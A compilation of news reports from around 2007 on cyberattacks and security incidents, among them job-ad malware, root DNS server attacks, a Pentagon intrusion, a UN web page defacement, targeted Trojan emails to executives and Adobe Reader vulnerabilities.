Hackers Fake Job Ads to Steal Corporate, Government Data

Hackers stole information from the U.S. Department of Transportation and several U.S. corporations by seducing employees with fake job-listings on ads and e-mail, a computer security firm said on Monday.

The list of victims included several companies known for providing security services to government agencies.

They include consulting firm Booz Allen, computer services company Unisys Corp. (UIS), computer maker Hewlett-Packard Co. (HPQ) and satellite network provider Hughes Network Systems, a unit of Hughes Communications Inc. (HUGH), said Mel Morris, chief executive of British Internet security provider Prevx Ltd.

Hewlett-Packard declined comment, while officials with other companies couldn’t be reached for comment. A Department of Transportation spokeswoman said the agency couldn’t find any indication of a security breach.

Malicious programs were able to pass sophisticated security systems undetected because that software hadn’t been instructed that they were dangerous. Hackers only targeted a limited group of personal computers, which kept traffic down and allowed them to stay under the radar of security police who tend to identify threats when activity reaches a certain level.

“What is most worrying is that this particular sample of malware wasn’t recognized by existing antivirus software. It was able to slip through enterprise defenses,” said Yankee Group security analyst Andrew Jaquith, who learned of the breach from Morris.

It was not clear whether the hackers used information stolen from the personal computers, Morris said.

Internet security firms began to release patches to fight the malicious software on Monday night.

Trend Micro, for example, has sent its customers software that prevents the malware from being installed on computers. It also blocks browsers from going to

Web sites that the company has identified as being infected with the dangerous programs, said company spokesman Mike Haro.

“This is a serious threat. It shows how sophisticated hackers have become,” Haro said.
A piece of software, NTOS.exe, probes the PC for confidential data, then sends it to a Web site hosted on Yahoo Inc. (YHOO). That site’s owner is likely unaware that it is being used by hackers, Morris said.

That Web site hosts data that had been stolen from more than 1,000 PCs and encrypted before it was posted on the site, according to Morris.

He said that he believes the hackers have set up several “sister” Web sites that are collecting similar data.

Hackers Attack Key Internet Traffic Computers

Hackers briefly overwhelmed at least two of the 13 computers that help manage global computer traffic Tuesday in one of the most significant attacks against the Internet since 2002.

Experts said the unusually powerful attacks, which were also noticed on three more of the 13 “root servers,” lasted as long as 12 hours but passed largely unnoticed by most computer users, a testament to the resiliency of the Internet.

[The attacks appear to have been distributed denial-of-service attacks, in which countless computers bombard servers with bogus "handshake" requests, essentially forcing the servers to waste time and energy trying to respond to machines that don't exist.]

Behind the scenes, computer scientists worldwide raced to cope with enormous volumes of data that threatened to saturate some of the Internet’s most vital pipelines.

The motive for the attacks was unclear, said Duane Wessels, a researcher at the Cooperative Association for Internet Data Analysis at the San Diego Supercomputing Center.

“Maybe to show off or just be disruptive; it doesn’t seem to be extortion or anything like that,” Wessels said.

Other experts said the hackers appeared to disguise their origin, but vast amounts of rogue data in the attacks were traced to South Korea.

The attacks seemed partly designed to test the resiliency of servers operated by UltraDNS, a company that operates servers managing traffic for some Web sites ending in “.org” and some other suffixes, experts said.

Officials with NeuStar Inc. (NSR), which owns UltraDNS, confirmed only that it had observed an unusual increase in traffic.

Among the targeted “root” servers that manage global Internet traffic were ones operated by the Defense Department and the Internet Corporation for Assigned Names and Numbers, the Internet’s primary oversight body.

[The DoD and ICANN servers — the "G" and "L" machines, respectively — appear to have been swamped by the load, while three "virtual" servers — "F," "I" and "M" — that actually distribute their tasks to other machines worldwide fared much better. Click here to view charts of traffic on all 13 root servers Tuesday.]

“There was what appears to be some form of attack during the night hours here in California and into the morning,” said John Crain, chief technical officer for the Internet Corporation for Assigned Names and Numbers. He said the attack was continuing and so was the hunt for its origin.

“I don’t think anybody has the full picture,” Crain said. “We’re looking at the data.”

Crain said Tuesday’s attack was less serious than attacks against the same 13 “root” servers in October 2002 because technology innovations in recent years have increasingly distributed their workloads to other computers around the globe.

Pentagon Cyber Attack Forces 1,500 PCs Off Line

As many as 1,500 computers in the Defense Department were taken off line because of a cyber attack, Pentagon officials said.

Defense Secretary Robert Gates says he expects systems will recover soon after Wednesday’s attack.

Gates said the Pentagon sees hundreds of attacks a day, and this one had no adverse impact on department operations. Employees whose computers were affected could still use their handheld BlackBerries.

The attack comes several days after several government agencies within the Department of Homeland Security admitted staffers had been attacked more than 800 times in the past two years.

Click here to read more.

During a press briefing Gates said of the Pentagon cyber attacks: “We obviously have redundant systems in place. … There will be some administrative disruptions and personal inconveniences.”

He said the Pentagon shut the computers down when a penetration of the system was detected, and the cause is still being investigated.

When asked if his own e-mail account was affected, Gates said: “I don’t do e-mail. I’m a very low-tech person.”

Navy Lt. Cmdr. Chito Peppler, a Pentagon spokesman, said Defense Department systems are probed every day by a wide variety of attacks.

“The nature of the threat is large and diverse, and includes recreational hackers, self-styled cyber-vigilantes, various groups with nationalistic or ideological agendas, transnational actors and nation-states,” Peppler said.

Experts: Russians Planning New Cyberattack

 A resurgence of malware activity in Russia has caught the eye of security vendors.

Recently, researchers at Trend Micro have found a Russian server hosting some 400 pieces of malware that may be part of a forthcoming large-scale attack, while at least one other vendor reported that the country has quickly moved back up on the list of purveyors of Web-based malware.

Paul Ferguson, network architect at Trend Micro, in Cupertino, Calif., said the company ran across the server, which had a “cornucopia of new malware,” the week of July 23.

During an investigation, researchers found there were Web sites with malicious iFrames proxying requests for the malware. The Web sites all had Italian-sounding names and Italian content, but actually resided in a hosting facility in Germany, he said.

An iFrame is an HTML element that makes it possible to embed another HTML document inside the main document.

In this case, the iFrames are believed to have been deliberately inserted by the owners of the Web sites to snare unsuspecting visitors as part of a porn-for-pay scam, Ferguson said.

“Looking at these massive samples of malware, we can’t help [but] think that there’s something brewing in Russia,” wrote researcher Carolyn Guevarra in a blog posting on Trend Micro’s Web site. “We have just seen these cyber-criminals pull the Italian Job recently.”

The operation dubbed “the Italian Job” by Trend Micro researchers involved some 10,000 Web sites with malicious code that redirected visitors to a server booby-trapped with drive-by exploits. The attack used Italian Web sites more than others.

Researchers at Sophos, headquartered in Abingdon, England, have also reported a rise in Web-based malware from Russia. The company’s experts noted in a report about the top 10 Web and e-mail-borne threats for July 2007 that the number of malware-infected Web pages hosted by Russia has increased substantially between June and July, jumping from 3.5 to 14.7 percent.

“This can be explained by the large number of Mal/iFrame and Mal/ObfJS-infected Web pages in Russia that have been compromised to serve as drive-by sites,” the report said.

The Sophos report put China at the top of the list with 49.8 percent and the United States in second place with 21.8 percent.

Malware numbers are growing rapidly, in particular adware, spyware and stealthy, targeted attacks, according to officials at McAfee, headquartered in Santa Clara, Calif.

In 2000, McAfee Avert Labs counted about 50,000 unique malicious items. That jumped to 100,000 in 2003, and in August 2006, the 200,000 mark was reached.

McAfee officials said they expect to see the 300,000th unique piece of malicious software, such as worms, viruses or Trojans, this week.

“This statistic underscores how the malware market has shifted from fame to fortune,” said Dave Marcus, security research and communications manager for McAfee Avert Labs. “Bots, adware, spyware and other attacks make up an over $100 billion global market for cyber-crime — surpassing drug trafficking as a global issue from a monetary perspective.”

U.N. Secretary-General’s Web Page Hacked

The United Nations reviewed the security procedures on its Web site Monday after a group of hackers posted anti-Israeli messages on the personal page of Secretary-General Ban Ki-moon.

A page usually featuring Ban’s speeches of Ban Ki-moon on Sunday instead displayed messages which read: “Hey Ysrail and Usa dont [sic] kill children and other people Peace for ever No war.”

The messages, apparently written by a group of hackers who go by the name CyberProtest, were posted in the early hours of Sunday, but had been removed by 9:15 a.m. EDT, a U.N. spokesman said.

“We are very concerned that this happened and we are investigating,” the spokesman said. “We will make security changes to prevent this from happening again.”

The messages were prefaced by the words “Hacked By Keremy 125 M0sted And Gsy That Is CyberProtest,” a reference to a group of hackers — one of whom is Turkish — who have previously been associated with attacks on high-profile Web sites.

On Monday, a Web site run by one of the group, M0sted, had links to a number of other CyberProtest attacks, including on the sites of the carmakers Toyota and Nissan as well as Harvard University.

“M0sted” said that CyberProtest’s objective was to spread the message “that the powerful have no right to oppress the powerless.”

The Web site of another CyberProtest member, “Eno7″ who described him or herself as an “IT security expert’” said that the group has been founded in response to the Israeli military offensive against Lebanon last year.

“The chief architects of this protest are myself, Eno7 from Turkey, and the byond hackers team from Chile. We expanded our efforts as nine other countries joined us afterwards,” it said.

CyberProtest did not intend to disrupt the operation of its victims’ Web sites, “only to give a message against war,” Eno7 said.

Security experts said today that the attack was most likely conducted using SQL injection, where a hacker exploits a vulnerability in a site that allows it to be altered at the same time that pages are being requested.

“It needn’t be a part of the site that allows visitors to interact with it — like a comments page,” Steve Moyle, founder and chief technology officer of Secerno, a security firm, said. “Even in a ‘read only’ section, a hacker can issue a command that forces the database to issue information, and [when] they find that vulnerability, an attacker can gain full control of the site.”

Among the other sites to have allegedly been hacked by CyberProtest are those of Nestle, the University of California and the Norfolk and Norwich University Hospital in England.

By Monday the Secretary-General’s page had been restored to show extracts of speeches on climate change as well as on the adoption of a hybrid peace-keeping force in Darfur.

Criminals Follow Ordinary Citizens Onto Internet

As more people turn to Web applications for everyday tasks like e-mail, friendship and payments, cyber criminals are following them in search of bank account details and other valuable data, security researchers said.

Users of Yahoo Inc.’s (YHOO) e-mail service, Google Inc.’s (GOOG) Orkut social networking site and eBay Inc.’s (EBAY) PayPal online payment service were among the targets of attacks in recent weeks. All three companies have acknowledged and plugged the security holes.

The attacks come as Microsoft Corp. (MSFT), whose Windows operating system runs about 90 percent of the world’s computers, has plugged many of the most easily exploited holes in its e-mail program, browser and other products following dozens of embarrassing breaches over the past several years.

FBI Investigating ‘Hit Man’ E-Mail Scheme

Dentists, doctors, lawyers and other professionals in the Pittsburgh area have been targeted by a “hit man” e-mail scheme, receiving messages that tell them to pay up to keep their lives, the FBI said.

The e-mail, which was sent to most recipients around Christmas, tells the reader that there is a contract out on his life, generally for $50,000. It says that if the recipient sends the “hit man” more money than that — generally ranging from $80,000 to $150,000 — the hit man will leave him alone.

No one has reportedly lost money or been harmed in the scam, but some recipients were unnerved by the messages, said Special Agent Bill Shore, who supervises the computer crime squad in the Pittsburgh FBI office.

“You think, ‘What did I get into? What do I gotta do to get out of this?”‘ Shore said.

The FBI became aware of the scam when people in Atlanta and New Orleans received similar e-mail in early December, Shore said. The scheme seems to have originated in Russia.

Online Videos Could Infect Computers With Viruses, Study Finds

Online videos aren’t just for bloopers and rants — some might also be conduits for malicious code that can infect your computer.

As anti-spam technology improves, hackers are finding new vehicles to deliver their malicious code. And some could be embedded in online video players, according to a report on Internet threats released Tuesday by the Georgia Tech Information Security Center as it holds its annual summit.

The summit is gathering more than 300 scholars and security experts to discuss emerging threats for 2008 — and their countermeasures.

Among their biggest foes are the ever-changing vehicles that hackers use to deliver “malware,” which can silently install viruses, probe for confidential info or even hijack a computer.

“Just as we see an evolution in messaging, we also see an evolution in threats,” said Chris Rouland, the chief technology officer for IBM Corp.’s Internet Security Systems unit and a member of the group that helped draft the report. “As companies have gotten better blocking e-mails, we see people move to more creative techniques.”

With computer users getting wiser to e-mail scams, malicious hackers are looking for sneakier ways to spread the codes.

Over the past few years, hackers have moved from sending their spam in text-based messages to more devious means, embedding them in images or disguised as Portable Document Format, or PDF, files.

“The next logical step seems to be the media players,” Rouland said.

There have only been a few cases of video-related hacking so far.

One worm discovered in November 2006 launches a corrupt Web site without prompting after a user opens a media file in a player. Another program silently installs spyware when a video file is opened. Attackers have also tried to spread fake video links via postings on YouTube.

That reflects the lowered guard many computer users would have on such popular forums.

“People are accustomed to not clicking on messages from banks, but they all want to see videos from YouTube,” Rouland said.

Another soft spot involves social networking sites, blogs and wikis. These community-focused sites, which are driving the next generation of Web applications, are also becoming one of the juiciest targets for malicious hackers.

Computers surfing the sites silently communicate with a Web application in the background, but hackers sometimes secretly embed malicious code when they edit the open sites, and a Web browser will unknowingly execute the code.

These chinks in the armor could let hackers steal private data, hijack Web transactions or spy on users.

Tuesday’s forum gathers experts from around the globe to “try to get ahead of emerging threats rather than having to chase them,” said Mustaque Ahamad, director of the Georgia Tech center.

They are expected to discuss new countermeasures, including tighter validation standards and programs that analyze malicious code. Ahamad also hopes the summit will be a launching pad of sorts for an informal network of security-minded programmers.

/**/ <br>

Bogus E-Mails Target Top Corporate Executives

During a two-hour period on June 24, something unusual and a bit worrying turned up in e-mail security firm MessageLabs Inc.’s filters: 514 messages tailored to senior executives of corporate clients that contained malicious programs designed to steal sensitive company data.

On Sept. 12 and 13 it happened again, but this time the firm captured 1,100 messages in a 16-hour wave.

The messages, which included executives’ names and titles, were from a purported employment service and offered attachments supposedly containing information on potential job candidates.

The attachments were Microsoft Word documents — a common file type erroneously believed to be safe by most computer users — that if not intercepted would have deposited Trojan horses, or malicious programs disguised as benign ones, onto targeted computers.

The two e-mail bursts point to a new and sophisticated take on an old-style attack with troubling implications for corporations, MessageLabs says.

In the past, most e-mail attacks of this kind have been comparably simple “phishing” scams sent to masses of consumers with the goal of inducing them to part with their financial-account information.

A small number of targeted attacks have been seen by security firms, but they typically targeted individuals in government or the military.

These new attacks, however, suggested a fairly low-tech e-mail scheme could begin to create a high-class problem for significant numbers companies, one in which valuable data are at risk and foolproof technical defenses are challenging.

MessageLabs says that it has been intercepting targeted e-mail attacks on corporate clients for at least three years but that the numbers began to track up significantly only over the last year.

The firm was catching one message a day as of the end of 2006. That number rose to about 10 a day by May and then jumped dramatically with the June and September attacks. Both of those incidents targeted executives in a wide range of industries.

“All of a sudden somebody new hit the scene,” said Mark Sunner, MessageLabs’ chief security analyst.

Who that was isn’t clear because technical tricks disguised the e-mails’ origin, he said. But it’s likely the person or group responsible came from the digital underground centered in Eastern Europe, where malicious-program writers and organized crime have long worked hand-in-hand online to steal and sell data for use in fraud schemes.

The newcomers appear to be after corporate secrets, he said.

They have sought, specifically, to infiltrate the computers of chief executives, chief financial officers, chief technology officers and other senior managers — and on occasion their assistants. And the Trojan horses were primarily designed to help the attacker gather Microsoft Office files from the “My Documents” directory of infiltrated PCs.

The people targeted “are the custodians of the company’s secrets,” Sunner said, and have computers full of juicy spreadsheets, financial reports, merger details and trade secrets.

“Why would somebody be targeting a CEO?” asks Scott O’Neal, chief of the Federal Bureau of Investigation’s cyber-intrusion section. “It may be to steal intellectual property, it may be corporate espionage, it may be to get into the database.”

Attacks of this kind have become much simpler, O’Neal said. “The how-to tutorials out there are getting better and better. And people need less and less technical skills.”

But unfortunately, few are reported to law enforcement because companies fear an investigation will disrupt their businesses and result in unwanted publicity. Such fears are unfounded, he said. The agency is careful not to be disruptive and maintains strict confidentiality.

In the recent attacks seen by MessageLabs, the attackers tried to improve the chances executives would open the Trojan-laced attachments by referencing bogus business matters and including personal details, such as name and title, which suggests the attackers spent time researching their targets.

Adobe: Acrobat, Acrobat Reader Have Security Holes

Adobe Systems Inc. (ADBE), whose software is used by millions of people to read documents sent over the Internet, said on Wednesday some of its programs contain yet-to-be-fixed flaws that make computers vulnerable to attack.

On October 5, Adobe posted a notice on its Web site that said it had unknowingly incorporated vulnerabilities into versions of Adobe Reader and Acrobat software that could allow malicious programs to get on to a PC without the user’s knowledge.

Such malicious software can take control of a machine and steal confidential data, send out tens of thousands of spam e-mails, or infiltrate government computer systems.

Adobe said it believes the flaws only affect computers running Microsoft Corp’s (MSFT) Windows XP operating system and Internet Explorer 7 Web browser. Adobe said it was working to rectify the problem but the fix might not be available until the end of October.

Some security experts say that may not be soon enough to stop hackers determined to get malicious software past firewalls and other security software programs.

“Users should pressure Adobe to release a patch sooner than that,” said Gadi Evron, a security expert at Beyond Security. He has organized three closed-door international conferences on efforts by governments and private companies to fight computer attacks.

Malicious software is a common problem. Recent examples have corrupted eBay Inc’s (EBAY) Skype Internet telephone service and Time Warner Inc’s (TWX) AOL instant messaging software.

Hackers sometimes hide malicious software inside Microsoft Word documents and photo files, hobbling computers when users open them.

Some security experts said that what makes the Adobe case disturbing is that it came to light before the company had a solution to fix the problem, which means hackers have an opportunity to exploit the situation.

The software maker would have preferred to hold off on notifying the public of the flaws in Acrobat and Reader until the updated software was ready, said John Landwehr, Adobe’s director of security solutions and strategy.

Earlier on Tuesday, Adobe disclosed “critical problems” in versions of three design programs, GoLive, Illustrator and Pagemaker, and simultaneously released software to repair the problems.

“That is the standard practice,” Landwehr told Reuters. “There is a protocol that is fairly well understood.”

But, Landwehr said, in the case of Acrobat and Reader, Adobe had to report the problem before the fix because it was reported on October 5 on security Web site www.heise-security.co.uk. Adobe disclosed it later that day on its own Web site.

Adobe has posted instructions on its Web site for working around the problem, www.adobe.com/support/security/.

But Landwehr said the instructions are mainly for administrators who run corporate networks, not consumers.

Adobe said PC users who are unable to program that database to fix it may need to wait until the software itself is fixed. The company said it would notify users on its Web site.

Rival browsers Firefox, www.firefox.com, and Opera, www.opera.com, have not reported any similar problems.